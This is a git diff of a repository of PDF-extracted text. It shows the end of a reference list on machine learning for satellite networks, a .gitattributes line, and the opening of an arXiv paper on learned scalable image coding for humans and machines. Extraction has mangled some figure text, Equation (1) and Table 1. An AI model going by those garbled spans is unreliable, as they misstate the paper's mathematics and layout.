2372
+
2373
+ 30
2374
+ Machine Learning for a 5G Future (ITU K), 2018, pp. 1-6, doi: https://doi.org/10.23919/ITU
2375
+ -WT.2018.8597888.
2376
+ [10] P. V. R. Ferreira et al., ”Reinforcement Learning for Satellite Communications: From LEO to
2377
+ Deep Space Operations,” in IEEE Communications Magazine, vol. 57, no. 5, pp. 70-75, May
2378
+ 2019, doi: https://doi.org/10.1109/MCOM.2019.1800796.
2379
+ [11] Wei, J.; Han, J.; Cao, S. Satellite IoT Edge Intelligent Computing: A Research on
2380
+ Architecture. Electronics 2019, 8, 1247. https://doi.org/10.3390/electronics8111247
2381
+ [12] T. Mai, H. Yao, Y. Jing, X. Xu, X. Wang and Z. Ji, ”Self-learning Congestion Control of
2382
+ MPTCP in Satellites Communications,” 2019 15th International Wireless Communications &
2383
+ Mobile Computing Conference (IWCMC), 2019, pp. 775-780,
2384
+ doi: https://doi.org/10.1109/IWCMC.2019.8766465.
2385
+ [13] Zhu, F, Ba, T, Zhang, Y, Gao, X, Wang, J. Terminal location method with NLOS exclusion
2386
+ based on unsupervised learning in 5G-LEO satellite communication systems. Int J Satell
2387
+ Commun Network. 2020; 38: 425– 436.
2388
+ https://doi.org/10.1002/sat.1346
2389
+ [14] Fannia Pacheco, Ernesto Exposito, Mathieu Gineste, A framework to classify heterogeneous
2390
+ Internet
2391
+ traffic
2392
+ with
2393
+ Machine
2394
+ Learning
2395
+ and
2396
+ Deep
2397
+ Learning
2398
+ techniques
2399
+ for
2400
+ satellite
2401
+ communications,Volume 173, 2020,107213,ISSN 1389-1286,
2402
+ https://doi.org/10.1016/j.comnet.2020.107213
2403
+ [15] M. ´A. V´azquez et al., ”Machine Learning for Satellite Communications Operations,”
2404
+ in IEEE Communications Magazine, vol. 59, no. 2, pp. 22-27, February 2021, doi:
2405
+ 10.1109/MCOM.001.2000367.
2406
+ [16] D. Zhou, M. Sheng, Y. Wang, J. Li and Z. Han, «Machine Learning-Based Resource Allocation
2407
+ in Satellite Networks Supporting Internet of Remote Things», in IEEE Transactions on Wireless
2408
+ Communications, vol. 20, no. 10, pp. 6606-6621, Oct. 2021, doi: 10.1109/TWC.2021.3075289.
2409
+ [17] Diro, Abebe, Chilamkurti et Naveen. “Distributed attack detection scheme using deep learning
2410
+ approach for Internet of Things,” Future Generation Computer Systems, Vol. 82, 2018, pp.
2411
+ 761-768.
2412
+ [18] Ahanger, T.A. “An effective approach of detecting DDoS using Artificial Neural Networks,”
2413
+ 2017 International Conference on Wireless Communications, Signal Processing and Networking
2414
+ (WiSPNET), 2017, pp. 707-711.
2415
+ [19] Muna, A.H.; Moustafa, N.; Sitnikova, E. “Identification of malicious activities in industrial
2416
+ DRAFT
2417
+ January 11, 2023
2418
+
2419
+ 31
2420
+ internet of things based on deep learning models,” Journal of Information Security and
2421
+ Applications, Vol. 41, 2018, pp. 1-11,
2422
+ [20] Ferrag, M.A.; Shu, L.;Djallel, H.; Choo, K.-K.R. “Deep Learning-Based Intrusion Detection
2423
+ for Distributed Denial of Service Attack in Agriculture 4.0,” Electronics 10, no. 11, 1257, pp.
2424
+ 1-26.
2425
+ [21] Jiyeon Kim, Jiwon Kim, Hyunjung Kim, Minsun Shim et Eunjung Choi. “CNN-Based
2426
+ Network Intrusion Detection against Denial-of-Service Attacks,” Electronics 9, no. 6: 916, 2020,
2427
+ PP. 1-21.
2428
+ [22] Popoola, S.I.; Adebisi, B.; Hammoudeh, M.; Gui, G.; Gacanin, H. “Hybrid Deep Learning for
2429
+ Botnet Attack Detection in the Internet of Things Networks.” IEEE Internet Things J. 2021,
2430
+ 8, pp. 4944–4956.
2431
+ [23] Lloyd Wood,M 2001, «Internetworking with satellite constellations»,PhD thesis,University of
2432
+ Surrey, Guildford,UK.https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.101.6697&r
2433
+ ep=rep1&type=pdf
2434
+ [24] ESA - Types of orbits - European Space Agency, https://www.esa.int/Enabling Support/S
2435
+ pace Transportation/Types of
2436
+ orbits.
2437
+ [25] Mission Design Division Staff, « Small spacecraft technology state of the art » . Center,
2438
+ Mountain View, CA, USA, Tech. Rep. NASA/TP-2015-216648/REV1, Dec. 2015 https://ww
2439
+ w.nasa.gov/sites/default/files/atoms/files/small spacecraft technology state of
2440
+ the art
2441
+ 2015 tagged.pdf
2442
+ [26] Conf´erences mondiales des radiocommunications (CMR), https://www.itu.int/fr/ITU-R/c
2443
+ onferences/wrc/Pages/default.aspx
2444
+ [27] G´erard Maral et Michel Bousquet (2009), « Satellites communications systems»,fifth
2445
+ edition,John Wiley & Sons Ltd, The Atrium, Southern Gate, Chichester, West Sussex,UK
2446
+ (pp 293-360).
2447
+ [28] Zhili Sun (2005), Satellite Networking Principles and Protocols, John Wiley & Sons Ltd, The
2448
+ Atrium, Southern Gate, Chichester, West Sussex PO19 8SQ, England. https://www.wiley.co
2449
+ m/en-us/Satellite+Networking
2450
+ [29] Satellites, By Chris Woodford, Dec. 2020. https://www.explainthatstuff.com/satellites.html
2451
+ [30] The Past, Present, and Future of Satellite Internet, By John Dilley — April 26, 2019, https:
2452
+ //www.satelliteinternet.com/resources/history-and-future-of-satellite-internet/
2453
+ [31] Fortune : Crowded satellite Internet market gets a new player: Lightspeed, BY AARON
2454
+ January 11, 2023
2455
+ DRAFT
2456
+
2457
+ 32
2458
+ PRESSMAN, February 9, 2021, https://fortune.com/2021/02/09/telesat-leo-internet-space-li
2459
+ ghtspeed-starlink-kuiper/
2460
+ [32] MODERN TIMES INVESTORS : «LEO Satellites Constellations, The New Space-Race For
2461
+ Global Internet Access», April 11, 2019 https://www.moderntimesinvestors.com/leo-satellites/
2462
+ [33] Z. Qu, G. Zhang, H. Cao and J. Xie, ”LEO Satellite Constellation for Internet of Things,”
2463
+ IEEE Access, vol. 5, 2017, pp. 18391-18401.
2464
+ [34] Xingqin Lin, Stefan Cioni, Gilles Charbit, Nicolas Chuberre, Sven Hellsten, Jean-Francois
2465
+ Boutillon,« On the Path to 6G: Embracing the Next Wave of Low Earth Orbit Satellite Access»,
2466
+ arXiv preprint arXiv:2104.10533, 2021.
2467
+ [35] Fran¸cois Chollet. Deep Learning with Python, ©2018 by Manning Publications Co. Fran¸cois
2468
+ Chollet-Deep Learning with Python-Manning (2018).pdf (fouladi.ir)
2469
+ [36] Online course, https://classroom.udacity.com/courses/ud188
2470
+ [37] Yeh, Wei-Chang & Lin, Yi-Ping & Liang, Yun-Chia & Lai, Chyh-Ming. «Convolution
2471
+ Neural Network Hyperparameter Optimization Using Simplified Swarm Optimization», 2021.
2472
+ primaryClass=cs.NE,https://arxiv.org/pdf/2103.03995.pdf
2473
+ [38] Sherstinsky, Alex. «Fundamentals of Recurrent Neural Network (RNN) and Long Short-Term
2474
+ Memory (LSTM) network», Physica D: Nonlinear Phenomena, Vol; 404, 2020, 132306.
2475
+ [39] Zargar, Sakib. (2021). Introduction to Sequence Learning Models: RNN, LSTM, GRU.
2476
+ 10.13140/RG.2.2.36370.99522.
2477
+ [40] «Illustrated Guide to LSTM’s and GRU’s: A step by step explanation» https://towardsdat
2478
+ ascience.com/illustrated-guide-to-lstms-and-gru-s-a-step-by-step-explanation-44e9eb85bf21
2479
+ [41] CCID. «research on the development of China’s satellite Internet industry». Department of
2480
+ Computing and Telematics Engineering, Universidad de Extremadura, 06800 M´erida, Spain.
2481
+ https://link.springer.com/chapter/10.1007/978-981-33-4922-3 14 (Febraury 2020).
2482
+ [42] Cao H., Wu L., Chen Y., Su Y., Lei Z., Zhao C. (2020) Analysis on the Security of Satellite
2483
+ Internet. In: Lu W. et al. (eds) Cyber Security. CNCERT 2020. Communications in Computer
2484
+ and Information Science, vol 1299.
2485
+ [43] K. Giotis, C. Argyropoulos, G. Androulidakis, D. Kalogeras, V. Maglaris,« Combining
2486
+ OpenFlow and sFlow for an effective and scalable anomaly detection and mitigation mechanism
2487
+ on SDN environments», Computer Networks, Vol. 62, 2014, pp. 122-136,
2488
+ [44] Shannon, C.E. A Mathematical Theory of Communication, Bell Syst. Tech. J. 1948, 27,
2489
+ 379–423.
2490
+ DRAFT
2491
+ January 11, 2023
2492
+
2493
+ 33
2494
+ [45] Han, W.; Xue, J.; Yan, H. “Detecting anomalous traffic in the controlled network based on
2495
+ cross entropy and support vector machine, “ IET Inf. Secur. 2019, 13, pp. 109–116.
2496
+ [46] Galeano-Brajones, Jes´us, Javier Carmona-Murillo, Juan F. Valenzuela-Vald´es, and Francisco
2497
+ Luna-Valero. “Detection and Mitigation of DoS and DDoS Attacks in IoT-Based Stateful SDN:
2498
+ An Experimental Approach“, Sensors 20, no. 3: 81, 2020.
2499
+ [47] Onen M, Molva R. “Denial of service prevention in satellite networks,“ IEEE International
2500
+ Conference on Communications (IEEE Cat. No. 04CH37577), vol. 7 IEEE; 2004. pp. 4387–4391.
2501
+ [48] Fahd A Alhaidari & Alia Mohammed Alrehan ,«A simulation work for generating a novel
2502
+ dataset to detect distributed denial of service attacks on Vehicular Ad hoc NETwork systems»
2503
+ March 4, 2021, College of Computer Science and Information Technology, Imam Abdulrahman
2504
+ Bin Faisal University, Dammam, Saudi Arabia https://journals.sagepub.com/doi/10.1177/1
2505
+ 5501477211000287
2506
+ [49] Ahsan, Md M., M. A.P. Mahmud, Pritom K. Saha, Kishor D. Gupta, and Zahed
2507
+ Siddique. 2021. ”Effect of Data Scaling Methods on Machine Learning Algorithms and Model
2508
+ Performance” Technologies 9, no. 3: 52. https://doi.org/10.3390/technologies9030052
2509
+ [50] https://omnet-manual.com/omnet-installation/
2510
+ [51] https://inet.omnetpp.org/Installation.html
2511
+ [52] https://www.anaconda.com/products/individual
2512
+ [53] https://pytorch.org/get-started/locally/
2513
+ [54] https://jupyter.org/install
2514
+ [55] https://code.visualstudio.com/download
2515
+ [56] Heather Monaghan, «Delay/Disruption Tolerant Networking», 2020, https://www.nasa.gov
2516
+ /directorates/heo/scan/engineering/technology/disruption tolerant networking.
2517
+ [57] Priyanka
2518
+ Mary
2519
+ Mammen.
2520
+ «Federated
2521
+ Learning:
2522
+ Opportunities
2523
+ and
2524
+ Challenges»,
2525
+ In
2526
+ Proceedings of ACM Conference, (Conference’17). ACM, New York, NY, USA, 2021. https:
2527
+ //arxiv.org/pdf/2101.05428.pdf.
2528
+ [58] OS3 framework
2529
+ https://omnetpp.org/download-items/OS3.html
2530
+ January 11, 2023
2531
+ DRAFT
2532
+
-9E2T4oBgHgl3EQfmgcA/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
.gitattributes CHANGED
@@ -255,3 +255,4 @@ DdAzT4oBgHgl3EQfif0c/content/2301.01499v1.pdf filter=lfs diff=lfs merge=lfs -tex
255
  k9FIT4oBgHgl3EQfriuF/content/2301.11332v1.pdf filter=lfs diff=lfs merge=lfs -text
256
  KdAyT4oBgHgl3EQff_ia/content/2301.00351v1.pdf filter=lfs diff=lfs merge=lfs -text
257
  79E2T4oBgHgl3EQflQc0/content/2301.03986v1.pdf filter=lfs diff=lfs merge=lfs -text
 
 
255
  k9FIT4oBgHgl3EQfriuF/content/2301.11332v1.pdf filter=lfs diff=lfs merge=lfs -text
256
  KdAyT4oBgHgl3EQff_ia/content/2301.00351v1.pdf filter=lfs diff=lfs merge=lfs -text
257
  79E2T4oBgHgl3EQflQc0/content/2301.03986v1.pdf filter=lfs diff=lfs merge=lfs -text
258
+ k9FIT4oBgHgl3EQfriuF/vector_store/index.faiss filter=lfs diff=lfs merge=lfs -text
0dE2T4oBgHgl3EQf4wg0/content/tmp_files/2301.04183v1.pdf.txt ADDED
@@ -0,0 +1,653 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Learned Disentangled Latent Representations for Scalable
2
+ Image Coding for Humans and Machines
3
+ Ezgi ¨Ozyılkan1,†,∗, Mateen Ulhaq1,‡,∗, Hyomin Choi∗, and Fabien Racap´e∗
4
+ †Dept. of Electrical and Computer Engineering, New York University
5
+ ‡School of Engineering Science, Simon Fraser University
6
+ ∗ InterDigital - Emerging Technologies Lab
7
+ eo2135@nyu.edu, mulhaq@sfu.ca, {hyomin.choi, fabien.racape}@interdigital.com
8
+ Abstract
9
+ As an increasing amount of image and video content will be analyzed by machines, there is
10
+ demand for a new codec paradigm that is capable of compressing visual input primarily for
11
+ the purpose of computer vision inference, while secondarily supporting input reconstruction.
12
+ In this work, we propose a learned compression architecture that can be used to build such
13
+ a codec. We introduce a novel variational formulation that explicitly takes feature data
14
+ relevant to the desired inference task as input at the encoder side. As such, our learned
15
+ scalable image codec encodes and transmits two disentangled latent representations for
16
+ object detection and input reconstruction. We note that compared to relevant benchmarks,
17
+ our proposed scheme yields a more compact latent representation that is specialized for the
18
+ inference task. Our experiments show that our proposed system achieves a bit rate savings
19
+ of 40.6% on the primary object detection task compared to the current state-of-the-art,
20
+ albeit with some degradation in performance for the secondary input reconstruction task.
21
+ 1
22
+ Introduction
23
+ It is projected that an increasing amount of captured visual content will be ana-
24
+ lyzed by machines in order to conduct vision analytics (e.g., object detection, image
25
+ classification, segmentation), instead of being solely viewed by humans [1]. Since re-
26
+ cent advances in artificial intelligence using deep neural networks (DNNs) necessitate
27
+ heavy computational resource usage, such machine analytics tasks may need to be
28
+ offloaded to a remote server. For example, low-end devices on the Internet of Things
29
+ (IoT) record a significant amount of visual content that needs to be transmitted to a
30
+ remote server to be analyzed and/or stored. To address the heavy communication re-
31
+ quirements of such systems, new compression schemes and standards activities such
32
+ as MPEG Video Coding for Machines (VCM) [2] have emerged, and have become
33
+ attractive areas of research in recent years.
34
+ At the same time, DNN-aided data-driven image compression algorithms [3, 4]
35
+ have attracted considerable research interest as they outperform the rate-distortion
36
+ (RD) performance of off-the-shelf image codecs such as JPEG2000 [5] and HEVC
37
+ Intra coding [6] across various experimental setups. Such DNN-based compression
38
+ approaches are typically optimized for mean squared error (MSE) and/or multi-scale
39
+ 1Contributed equally to this work.
40
+ This work was done while E. ¨Ozyılkan and M. Ulhaq were interns at InterDigital.
41
+ arXiv:2301.04183v1 [eess.IV] 10 Jan 2023
42
+
43
+ (a)
44
+ (b)
45
+ (c)
46
+ Figure 1: Various methods to separate information into task-relevant data for multiple tasks in
47
+ a scalable manner. The data separation is achieved by (a) generating feature data s alongside a
48
+ residual r = x− ˜x which encodes the error in the decoder-side reconstruction ˜x of the original input
49
+ x, (b) transforming x with a single learned encoder, and (c) transforming x and s with two learned
50
+ encoders into two latent representations {y1, y2}. Dotted lines denote the decoder operations.
51
+ structural similarity index (MS-SSIM) [7], which are used as distortion metrics be-
52
+ tween the original and reconstructed images within the loss function. Moreover, in
53
+ the case of DNN-based compression models targeting a machine vision task, the dis-
54
+ tortion metric is simply replaced with a task-specific loss, as in [8,9]. More recently,
55
+ the studies in [10, 11] present DNN-based scalable compression frameworks that si-
56
+ multaneously support multiple tasks through scalable bitstreams sent to the decoder.
57
+ For example, in [11], the base layer bitstream is transmitted to the decoder for the ob-
58
+ ject detection task, and the enhancement layer bitstream is additionally transmitted
59
+ only when the reconstruction of input images is required. To optimize the compres-
60
+ sion performance of such a scalable system, the compression model must learn how
61
+ to separate the information into different parts necessary for each task without any
62
+ significant overlap.
63
+ In this work, we propose a two-task scalable image codec with a new variational
64
+ formulation alternative to the current state-of-the-art proposed in [11]. Our scalable
65
+ codec provides a base layer supporting a machine vision task, with significant gains
66
+ in RD-performance compared to relevant benchmarks, and an enhancement layer
67
+ supporting an input reconstruction task. In Section 2, we briefly summarize the most
68
+ relevant prior work. Our proposed method is then described in detail in Section 3,
69
+ followed by comprehensive experimental results with various configurations of our
70
+ model detailed in Section 4.
71
+ Furthermore, in Section 5, we present an in-depth
72
+ comparison of our model with the most relevant benchmark from an information-
73
+ theoretic perspective. Finally, in Section 6 we conclude on the analyzed approaches
74
+ and suggest possible future research directions.
75
+ 2
76
+ Related Work
77
+ Different approaches have been explored in the literature in order to build codecs that
78
+ separate the information into multiple parts associated with corresponding end tasks,
79
+ some of which are shown in Fig. 1. For example, Yan et al. [10] adopts a scheme
80
+ shown in Fig. 1(a) in which the feature representation s, designated for a vision task,
81
+ is extracted from the input x with a learned transform, in order to be consecutively
82
+ compressed and transmitted to the decoder. Therefore, at the decoder, s is used as an
83
+ input to a computer vision network. Additionally, an estimate of the input ˜x can be
84
+
85
+ r
86
+ ry2
87
+
88
+ S
89
+ y1-
90
+ y2
91
+ y1
92
+ SFigure 2: VAE-style compression model for our proposed method with latent-space scalability.
93
+ determined from s using an auxiliary module. Using this estimate, an encoder may
94
+ also compress and transmit a residual r = x− ˜x. At the decoder side, r may be used
95
+ in conjunction with the previously transmitted s in order to reconstruct the input x.
96
+ However, in this scheme, the optimality of r with respect to the image reconstruction
97
+ task depends on how well ˜x can be reconstructed from the feature representation s.
98
+ Choi et al. [11] introduce a latent-space scalable codec based on the Cheng et
99
+ al. [4] architecture. As shown in Fig. 1(b), a single learned transform in the encoder
100
+ maps the input x into a latent space consisting of two learned latent representations
101
+ y1 and y2. To carry out the machine vision task at the decoder side, y1 is subse-
102
+ quently fed into another learned transform, referred to as latent-space transform, in
103
+ order to obtain an estimate of s, which will be used as an input to a computer vision
104
+ network. For the input reconstruction task, both latent representations y1 and y2 are
105
+ concatenated and used as input to a pixel reconstruction decoder. In order to ensure
106
+ that there is no loss in compression efficiency when coding y1 and y2 separately, the
107
+ aforementioned latent representations should be maximally independent of one an-
108
+ other. Thus, a model should ideally be trained to minimize the information-theoretic
109
+ mutual information (MI) [12] quantity I(y1; y2). Although works such as [13] pro-
110
+ pose methods for estimating MI, it is well-known that estimating MI is especially
111
+ challenging for high dimensional variables.
112
+ In this study, we explore an alternative framework by introducing s as an ad-
113
+ ditional input to a learned transform in the encoder, as shown in Fig. 1(c). This
114
+ helps reduce the size of the bitstream associated with y1, while allowing y1 and y2
115
+ to become more disentangled. Making y1 more compact should be indeed beneficial
116
+ for the VCM paradigm, which considers the vision inference as its primary task.
117
+ 3
118
+ Proposed Framework
119
+ We propose a DNN-based compression model that supports both object detection and
120
+ input reconstruction tasks. We follow a methodology similar to the two-task scalable
121
+ compression model with latent-space scalability in [11], but with some architectural
122
+ changes. Namely, we feed the feature representation s that is outputted by an in-
123
+ termediate layer of a vision task model directly as an input into our encoder. Fig. 2
124
+ provides a conceptual system architecture for our proposed method, where the base
125
+ latent representation y1 is designated to capture the common information between x
126
+ and s, whereas the enhancement latent representation y2 captures information only
127
+ relevant to x. To be optimal from a compression point of view, the information in y2
128
+ should not have any overlap with the information in y1. In this section, we discuss
129
+
130
+ Analysis
131
+ Synthesis
132
+ y2
133
+ q(2α; Φα)
134
+ pe(αly1, y2; 0)
135
+ :y1
136
+ qp(yila, s; Φs)
137
+ pe(syi; 0s)the rationale for this compression model with a variational formulation as well as the
138
+ implementation details of the neural network architecture.
139
+ 3.1
140
+ Scalable compression model with an alternative variational formulation
141
+ Similar to [14], we derive our formulation from a Bayesian variational inference per-
142
+ spective. Given sample observations of a random variable x, accompanied with a
143
+ generative model p(x | y), one seeks a posterior distribution p(y | x). The poste-
144
+ rior distribution cannot be, in general, expressed in closed form. Therefore, one can
145
+ approximate it using a variational density of q(y | x). One may then parameterize
146
+ the approximate posterior as qφ(y | x; φ) and the generative model distribution as
147
+ pθ(x | y; θ), and consecutively, seek to minimize the Kullback–Leibler (KL) diver-
148
+ gence DKL(qφ(y | x; φ) ∥ pθ(y | x; θ)).
149
+ In our case, the distributions qφ(y1 | x, s; φs) and qφ(y2 | x; φx) are learned by
150
+ the encoder-side analysis transforms ge,s and ge,x, respectively, and are parameterized
151
+ by the weights φs and φx. Both latent representations y1 and y2 are then rounded
152
+ to the closest integer values to obtain ˆy1 and ˆy2 before being fed into an entropy
153
+ coder. During training, we follow the same strategy for quantization as in [15], by re-
154
+ placing the rounding operation with additive uniform random noise to obtain “noisy”
155
+ counterparts of the latent representations, ˜y1 and ˜y2, which approximate ˆy1 and ˆy2.
156
+ At the decoder side, the synthesis transforms gd,x and gd,s learn the marginal
157
+ distributions pθ(x | y1, y2; θx) and pθ(s | y1; θs), both parameterized by the weights
158
+ θx and θs, respectively. Note that y1 is jointly learned from both variables x and s,
159
+ and also is given as an input to both synthesis transforms. Conversely, y2 is only
160
+ extracted from the input image x and is thus given as input only to gd,x.
161
+ We model the variables y1 and y2 using a parametric, fully factorized density
162
+ function as in [3]. More specifically, each element of the latent representations is
163
+ modeled as a zero-mean Gaussian distribution with a standard deviation that is pre-
164
+ dicted from a latent via a hyperprior block. Following the graphical model induced
165
+ in Fig. 2, we model the joint distribution of random variables as pθ(x, s, y1, y2) =
166
+ p(y1)p(y2)pθ(x | y1, y2; θx)pθ(s | y1; θs). In order to approximate the posterior den-
167
+ sities of the latent variables, we factorize the approximate posterior distribution as
168
+ qφ(y1, y2 | x, s) = qφ(y1 | x, s; φs)qφ(y2 | x; φx). Then, the loss function to minimize
169
+ is given by the KL divergence between the approximate posterior qφ(˜y1, ˜y2 | x, s)
170
+ and the true posterior pθ(˜y1, ˜y2 | x, s) over the data distribution p(x, s):
171
+ L = DKL(qφ(˜y1, ˜y2 | x, s) ∥ pθ(˜y1, ˜y2 | x, s) | p(x, s))
172
+ = Ex,s∼p(x,s)
173
+
174
+ DKL (qφ(˜y1, ˜y2 | x, s) ∥ pθ(˜y1, ˜y2 | x, s))
175
+
176
+ = Ex,s∼p(x,s)E˜y1,˜y2∼qφ
177
+ ��
178
+ log qφ(˜y1 | x, s; φs) + log qφ(˜y2 | x; φx)
179
+
180
+
181
+
182
+ log pθ(x | ˜y1, ˜y2; θx)
183
+
184
+ ��
185
+
186
+ Dx
187
+ + log pθ(s | ˜y1; θs)
188
+
189
+ ��
190
+
191
+ Ds
192
+ + log p(˜y1)
193
+
194
+ ��
195
+
196
+ Ry1
197
+ + log p(˜y2)
198
+
199
+ ��
200
+
201
+ Ry2
202
+ ��
203
+ + const.
204
+ (1)
205
+ The first parenthesized group of terms within the expectation is zero since the den-
206
+ sities q are a product of uniform densities of unit width, due to perturbation with
207
+ uniform noise during training. The terms labeled Dx and Ds coincide with distortion
208
+
209
+ Figure 3: Schematic of the proposed neural network architecture. Hyperprior blocks and side
210
+ information bitstreams similar to [3] are also present, but are not visualized here.
211
+ Table 1: Network layer configurations of the encoder and of the decoder.
212
+ Encoder
213
+ Decoder
214
+ ge,s
215
+ ge,x
216
+ gd,s
217
+ gd,x
218
+ No.
219
+ Layer
220
+ In/Out
221
+ Layer
222
+ In/Out
223
+ Layer
224
+ In/Out
225
+ Layer
226
+ In/Out
227
+ 1
228
+ conv5s1
229
+ Cs + 3/N
230
+ conv5s2
231
+ 3/N
232
+ deconv5s1
233
+ M1/N
234
+ deconv5s2
235
+ M/N
236
+ 2
237
+ conv5s1
238
+ N/N
239
+ conv5s2
240
+ N/N
241
+ deconv5s1
242
+ N/N
243
+ deconv5s2
244
+ N/N
245
+ 3
246
+ conv5s2
247
+ N/M1
248
+ conv5s2
249
+ N/N
250
+ deconv5s2
251
+ N/Cs
252
+ deconv5s2
253
+ N/N
254
+ 4
255
+ conv5s2
256
+ N/M2
257
+ deconv5s2
258
+ N/3
259
+ terms associated with the input image x and feature representation s for the targeted
260
+ vision task, respectively. The terms labeled Ry1 and Ry2 represent the cross-entropy
261
+ values, corresponding to the bit costs of encoding ˜y1 and ˜y2 under the respective
262
+ learned entropy models.
263
+ By linking the parameterized density functions to the transform coding paradigm,
264
+ we observe that the minimization of the KL divergence effectively corresponds to
265
+ optimizing the VCM model for rate-distortion performance associated with both input
266
+ image reconstruction and object detection tasks. In the case of using the MSE metric,
267
+ the distortion terms Dx and Ds in Eq. (1) correspond to closed-form likelihoods, or
268
+ more specifically, to Gaussian distributions (see [15] for relevant discussion). We can
269
+ write the loss function from Eq. (1) compactly as
270
+ L = Ry1 + Ry2 + λ · Dx + γ · Ds,
271
+ (2)
272
+ where the scalars λ and γ denote the Lagrange multipliers corresponding to the
273
+ distortion budgets associated with x and s, respectively.
274
+ 3.2
275
+ Implementation of the neural network architecture
276
+ As seen in Fig. 3, we build our neural network architecture based on the approach
277
+ in [3]. We generate the feature representation s ∈ RCs×Hs×Ws by feeding the input
278
+ image x ∈ R3×H×W through the first few layers of a machine vision model, denoted
279
+ as Vfront in Fig. 3. To have a fair comparison with [11], we use the first consecutive
280
+ 13 layers of the YOLOv3 [16] object detection model to generate s with Cs = 256
281
+ channels, and spatial dimensions of Hs = H
282
+ 8 and Ws = W
283
+ 8 .
284
+ The analysis transform ge,s generates the base latent representation y1 using as
285
+ input the channel-wise concatenation of s and Resize(x), where we have chosen a
286
+ spatial bicubic interpolation filter for Resize : R3×H×W → R3×Hs×Ws. The analysis
287
+
288
+ Encoder
289
+ Decoder
290
+ y2
291
+ 92
292
+ 2
293
+ ge,a
294
+ Q
295
+ AE
296
+ gd,c
297
+ Enhancement
298
+ Resize
299
+ bitstream
300
+ KS
301
+ y1
302
+ y1
303
+ y1
304
+ ge,s
305
+ AE
306
+ AD
307
+ gd,s
308
+ 1
309
+ Q
310
+ Base
311
+ S
312
+ bitstreamtransform ge,x generates the enhancement latent representation y2 using only x as
313
+ input. Next, y1 and y2 are quantized (Q) and fed into an arithmetic encoder (AE),
314
+ which yields the base and enhancement bitstreams, respectively.
315
+ At the decoder side, the respective bitstreams are then fed into an arithmetic
316
+ decoder (AD) in order to reconstruct the base and enhancement latent represen-
317
+ tations ˆy1 and ˆy2. Using ˆy1, the synthesis transform gd,s reconstructs the feature
318
+ representation ˆs, which we feed into the remaining part of the machine vision model,
319
+ denoted as Vback, in order to generate the inference results ˆt. Using the channel-wise
320
+ concatenation of ˆy1 and ˆy2, the synthesis transform gd,x reconstructs the input ˆx.
321
+ As our network architecture builds upon [3], it employs separate hyperprior mod-
322
+ ules for both latent representations y1 and y2. However, these are omitted in Fig. 3
323
+ for brevity. The layer configurations for the hyperprior modules are the same as those
324
+ presented in [3], whereas details on the employed encoder/decoder modules are shown
325
+ in Table 1. We adopt a similar configuration for the encoder/decoder architecture
326
+ as in [3], for our ge,i and gd,i where i = {x, s}. We define the analysis transforms
327
+ ge,i using convolutional layers with 5 × 5 kernels and a stride of 2 (i.e., conv5s2),
328
+ interleaved with generalized divisive normalization (GDN) layers [17]. The synthe-
329
+ sis transforms gd,i consist of transposed convolutional layers for upsampling with a
330
+ stride of 2 (i.e., deconv5s2), interleaved with inverse GDN (IGDN) layers. Note that
331
+ in order to match the spatial dimension of the latent representations, the number
332
+ of layers at the analysis/synthesis transforms both at the encoder and decoder sides
333
+ differ. Table 1 lists the layers used in our model, along with their corresponding input
334
+ and output channel dimensions. In our experiments, we fix N = 192 for all models,
335
+ and vary M1 and M2 depending on the configuration as detailed in Section 4.2.
336
+ 4
337
+ Experiments and Results
338
+ 4.1
339
+ Experimental setup
340
+ We implemented all DNN-based models using the CompressAI library [18].
341
+ The
342
+ models are trained on randomly cropped patches of size 256×256 from the Vimeo-90K
343
+ [19] dataset, with a batch size of 8. We use an Adam optimizer with an initial learning
344
+ rate of 1 × 10−4, where the rate is reduced by a factor of 10 whenever the decrease in
345
+ validation loss stagnates, up to 4 times, after which we stop training. We use the loss
346
+ function from Eq. 2 with Dx = MSE(x, ˆx) and Ds = MSE(s, ˆs). Our models have
347
